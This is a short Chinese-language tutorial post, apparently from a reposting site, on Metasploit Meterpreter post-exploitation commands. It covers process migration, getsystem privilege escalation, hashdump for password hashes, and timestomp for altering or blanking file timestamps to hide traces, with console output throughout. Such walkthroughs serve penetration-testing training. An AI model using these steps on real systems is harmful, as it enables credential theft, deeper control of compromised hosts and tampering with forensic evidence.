Metasploit之——高级后渗透模块(metasploit常用漏洞)

网友投稿 383 2022-10-02


Metasploit之——高级后渗透模块(metasploit常用漏洞)

1.迁移到更安全的进程

migrate [要迁移到的进程id]

2.获取系统级权限

getsystem

注:getsystem模块在比较新的Windows系统中不太稳定,最好使用本地的提升权限方法和模块来提升控制权限。

meterpreter > getsystem...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

3.获取密码的哈希值

run hashdump

获取了目标的系统级管理权限后,就可以使用hashdump命令获取被渗透系统上登录密码的哈希值。

4.修改文件的访问时间、修改时间和创建时间

这里用到的命令是timestomp

4-1.查看文件的时间信息

timestomp -v [目标文件]meterpreter > timestomp -v e:\test.txt[*] Showing MACE attributes for e:test.txtModified : 2019-01-25 10:24:42 +0800Accessed : 2019-01-25 11:20:58 +0800Created : 2019-01-25 10:23:22 +0800Entry Modified: 2019-01-25 10:24:42 +0800

4-2.修改文件的时间信息

timestomp -z [时间信息] [目标文件]

此时的时间信息格式为:MM/DD/YYYY HH24:MI:SS

meterpreter > timestomp -v e:\test.txt[*] Showing MACE attributes for e:test.txtModified : 2019-01-25 10:24:42 +0800Accessed : 2019-01-25 11:20:58 +0800Created : 2019-01-25 10:23:22 +0800Entry Modified: 2019-01-25 10:24:42 +0800meterpreter > meterpreter > timestomp -z "01/25/2019 11:00:00" e:\test.txt[*] Setting specific MACE attributes on e:test.txtmeterpreter > timestomp -v e:\test.txt[*] Showing MACE attributes for e:test.txtModified : 2019-01-25 11:00:00 +0800Accessed : 2019-01-25 11:26:29 +0800Created : 2019-01-25 11:00:00 +0800Entry Modified: 2019-01-25 11:00:00 +0800

4-3.清空时间信息

timestomp -b [目标文件]meterpreter > timestomp -b e:\test.txt[*] Blanking file MACE attributes on e:test.txt


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:Metasploit之——其他后渗透模块(metasploit内网穿透)
下一篇:Metasploit之——基本后渗透命令(metasploit攻击)
相关文章

 发表评论

暂时没有评论,来抢沙发吧~